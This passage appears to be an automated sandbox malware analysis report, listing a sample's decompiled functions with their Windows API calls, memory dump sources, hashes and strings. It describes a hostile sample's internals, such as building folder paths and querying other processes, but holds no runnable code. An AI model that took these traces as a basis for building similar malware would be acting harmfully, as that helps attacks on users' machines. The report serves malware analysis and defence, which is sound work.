                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 092a7a62d598c63e6cdb51325a89373f54da762ea56ea95e4af49b2cc170a9bd
                                  • Instruction ID: 28cf20535df9735acbfbdd083d743a147e6cc0fb81e7298c1b65ec777cf4eb64
                                  • Opcode Fuzzy Hash: 092a7a62d598c63e6cdb51325a89373f54da762ea56ea95e4af49b2cc170a9bd
                                  • Instruction Fuzzy Hash: C051BB76A1011CAFC756EB54DC82EFE337EEB48300F044569BA059B2D1EE70AE408BA1
                                  Function 00401FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00401FDF, 00401FF5, 004020B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 9e0336d2bcea2b9127a09b2609a49097b372c93ef91d85bcdebcc373aeb724c3
                                  • Instruction ID: ff17e37fbbf7d450a420bcf5b3d098c8a50699e44cb5c80a529b37f6d2b3c408
                                  • Opcode Fuzzy Hash: 9e0336d2bcea2b9127a09b2609a49097b372c93ef91d85bcdebcc373aeb724c3
                                  • Instruction Fuzzy Hash: D721F5365103998AD720AA35C5486DEF3A6DB80361F944067CA192B3C1E2BA194BD79E
                                  Function 003FEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FEBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FEBF1
                                  • lstrcat.KERNEL32(?,011B04C0), ref: 003FEC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: d6b37099950317d428c9fc96cd2da1f2c4d8710b0fca3db9974e04d903f0af32
                                  • Instruction ID: 8e2065697351048c76a6b77ba7e4fde5856ffec2cb9d5c0f0812338ebd42eb52
                                  • Opcode Fuzzy Hash: d6b37099950317d428c9fc96cd2da1f2c4d8710b0fca3db9974e04d903f0af32
                                  • Instruction Fuzzy Hash: 1E31CB7191016C9BCB16EF64DC41BEE73B9BF48300F145579BA06DB290DE709E448B90
                                  Function 00404480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00404492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004044AD
                                  • CloseHandle.KERNEL32(00000000), ref: 004044B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004044E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: 4b7eea8227b0c04ce76aeb988d7a97edae74e4365b3cf2dfc921e5a46a145d77
                                  • Instruction ID: d4174cc54809a6cdffe2cd61389c29afc795c6ea93e7b6a399f2bc5e5ec95ed0
                                  • Opcode Fuzzy Hash: 4b7eea8227b0c04ce76aeb988d7a97edae74e4365b3cf2dfc921e5a46a145d77
                                  • Instruction Fuzzy Hash: 5EF04CF08012253FE7209B709C09BE776A8AF44700F0441A2FB44E72C0DBB49D8087A4
                                  Function 00408FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00408FDD
                                    • Part of subcall function 004087FF: __amsg_exit.LIBCMT ref: 0040880F
                                  • __getptd.LIBCMT ref: 00408FF4
                                  • __amsg_exit.LIBCMT ref: 00409002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00409026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 3052f33832cc56f5f87bad7b2cab2fcdb318efffcb66e776ae14b6193cd1f705
                                  • Instruction ID: 8d0a15e23785817e83457bb6de279457a828c65a9e535bebd7db0ac14073c406
                                  • Opcode Fuzzy Hash: 3052f33832cc56f5f87bad7b2cab2fcdb318efffcb66e776ae14b6193cd1f705
                                  • Instruction Fuzzy Hash: FEF096329486109BD761BB7A980675D33A16F00718F24813FF444772D3DF7C6940E65E
                                  Function 00407310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(------,003E5BEB), ref: 0040731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0040733F
                                  • lstrcat.KERNEL32(?,------), ref: 00407349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: 22f1a92d4c634207354e7ef5406156f982f44a16f7e7214f1abbaee2ce3c9ffb
                                  • Instruction ID: 76a8433a50ebcac5079ab5b84e814d48d85d04066f67afe7800e0194313d9f04
                                  • Opcode Fuzzy Hash: 22f1a92d4c634207354e7ef5406156f982f44a16f7e7214f1abbaee2ce3c9ffb
                                  • Instruction Fuzzy Hash: A0F0C9749517029FDB249F75D858927BAF9EF84B0131C982EAC9AC7354EB34F841CB20
                                  Function 003F33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 0d27412ed434dcdf7b7db72664b19b922b93a9b9e5b349ef7b315566579817c7
                                  • Instruction ID: 440703d554d4ad8796f3006321d93b1ff935f2d02a10adc01a288b8b1deb6b38
                                  • Opcode Fuzzy Hash: 0d27412ed434dcdf7b7db72664b19b922b93a9b9e5b349ef7b315566579817c7
                                  • Instruction Fuzzy Hash: 2A120B70A012059FDB2ACF19C554B35B7E5AF45718B1EC0AEE909CB3A2D776ED82CB40
                                  Function 003F7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7CAF
                                    • Part of subcall function 003F7D40: std::_Xinvalid_argument.LIBCPMT ref: 003F7D58
                                    • Part of subcall function 003F7D40: std::_Xinvalid_argument.LIBCPMT ref: 003F7D76
                                    • Part of subcall function 003F7D40: std::_Xinvalid_argument.LIBCPMT ref: 003F7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: 4d87a0a0e1440b9b7551a449d3ab2a508d72d157b01313b1281520f9e56076ff
                                  • Instruction ID: a62ea02f1e2bd705a445aefbaa1a9b5f5652804387bf286251a9fda353dc34f8
                                  • Opcode Fuzzy Hash: 4d87a0a0e1440b9b7551a449d3ab2a508d72d157b01313b1281520f9e56076ff
                                  • Instruction Fuzzy Hash: F131E9723082184BD736DE6CE880E7AF7E9EF91750B21462BF6568B681D7719C4183A4
                                  Function 003E6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 003E6F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E6F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: d4e1488b8a3afb8e824b5f0bf922db4094553fb1f3732e5de77b718a5b05851c
                                  • Instruction ID: 0e96661c246759d5bca79cfae795d78c2b620056619716e2be1b5980fcefc405
                                  • Opcode Fuzzy Hash: d4e1488b8a3afb8e824b5f0bf922db4094553fb1f3732e5de77b718a5b05851c
                                  • Instruction Fuzzy Hash: 6C21AEB06007518BEB218B61DC85BB673E8EB54745F44497CF946CB6C0F774E946C750
                                  Function 003E1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000), ref: 003E162D
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E164F
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E1671
                                    • Part of subcall function 003E1610: lstrcpy.KERNEL32(00000000,?), ref: 003E1693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
